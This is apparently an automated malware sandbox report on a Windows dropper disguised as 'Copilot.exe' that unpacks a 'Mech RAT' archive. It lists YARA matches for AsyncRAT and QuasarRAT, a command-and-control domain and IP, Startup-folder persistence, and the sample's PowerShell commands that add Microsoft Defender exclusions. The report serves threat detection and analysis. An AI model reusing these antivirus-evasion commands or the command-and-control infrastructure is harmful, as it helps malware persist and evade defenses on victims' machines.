                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000004.00000002.1276652478.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: assembly_.dll.pdbR source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: MONOCE~3.DLLMono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B45000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdbSHA256 source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdb source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdbe+ source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\MSTest.Core\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdb source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: cil.Pdb.j source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdb source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll0] source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cil.Pdb. source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdbl source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: BouncyCastle.Crypto.pdb source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: .pdb;Pdb file found for path '{0}' source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49973 -> 147.185.221.21:47900
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: content-portion.gl.at.ply.gg
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.7:49971 -> 147.185.221.21:47900
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: content-portion.gl.at.ply.gg
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: powershell.exe, 00000015.00000002.1843224693.00000205D189C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000013.00000002.1629544454.00000204C320A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: PixpFUv4G7.exe, 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Microsoft Copilot.exe.1.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp, Open.Nat.dll.4.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: Open.Nat.dll.4.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: powershell.exe, 00000010.00000002.1461828423.00000218A3D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1463069808.00000218A3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1850332223.00000205D1B7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1846070427.00000205D1980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: client.bin.4.drString found in binary or memory: https://api.ipify.org/
                    Source: powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: Open.Nat.dll.4.drString found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: https://github.com/novotnyllc/bc-csharp
                    Source: powershell.exe, 00000013.00000002.1637714732.00000204C340C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                    Source: client.bin.4.drString found in binary or memory: https://ipwho.is/
                    Source: powershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: client.bin.4.drString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: client.bin.4.drString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: client.bin.4.drString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                    Source: BouncyCastle.Crypto.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0

                    E-Banking Fraud

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB36E421_2_00007FFAACB36E42
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB323611_2_00007FFAACB32361
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB316E91_2_00007FFAACB316E9
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB360961_2_00007FFAACB36096
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB320C11_2_00007FFAACB320C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFAACB2264D21_2_00007FFAACB2264D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFAACB20FDD21_2_00007FFAACB20FDD
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 28_2_00007FFAACB50E5E28_2_00007FFAACB50E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 28_2_00007FFAACB516E928_2_00007FFAACB516E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 28_2_00007FFAACB520C128_2_00007FFAACB520C1
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 29_2_00007FFAACB20E5E29_2_00007FFAACB20E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 29_2_00007FFAACB216E929_2_00007FFAACB216E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 29_2_00007FFAACB220C129_2_00007FFAACB220C1
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 30_2_00007FFAACB20E5E30_2_00007FFAACB20E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 30_2_00007FFAACB216E930_2_00007FFAACB216E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 30_2_00007FFAACB220C130_2_00007FFAACB220C1
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 31_2_00007FFAACB40E5E31_2_00007FFAACB40E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 31_2_00007FFAACB416E931_2_00007FFAACB416E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 31_2_00007FFAACB420C131_2_00007FFAACB420C1
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll E51721DC0647F4838B1ABC592BD95FD8CB924716E8A64F83D4B947821FA1FA42
                    Source: PixpFUv4G7.exe, 00000000.00000002.1257409990.0000000000D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunarchiver.exe8 vs PixpFUv4G7.exe
                    Source: PixpFUv4G7.exe, 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCopilot.exe4 vs PixpFUv4G7.exe
                    Source: PixpFUv4G7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                    Source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: Quasar.resources.dll.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Copilot.exe.0.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Copilot.exe.0.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Copilot.exe.0.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Microsoft Copilot.exe.1.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: Copilot.exe.0.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Copilot.exe.0.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: Quasar.Common.dll.4.dr, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
                    Source: Quasar.Common.dll.4.dr, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
                    Source: Quasar.Common.dll.4.dr, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
                    Source: Quasar.Common.dll.4.dr, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@27/74@2/2
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnkJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeMutant created: \Sessions\1\BaseNamedObjects\CuWTrNEBgjX4AbNx
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeFile created: C:\Users\user~1\AppData\Local\Temp\Copilot.exeJump to behavior
                    Source: PixpFUv4G7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PixpFUv4G7.exeReversingLabs: Detection: 71%
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-52
                    Source: unknownProcess created: C:\Users\user\Desktop\PixpFUv4G7.exe "C:\Users\user\Desktop\PixpFUv4G7.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess created: C:\Users\user\AppData\Local\Temp\Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Copilot.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                    Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
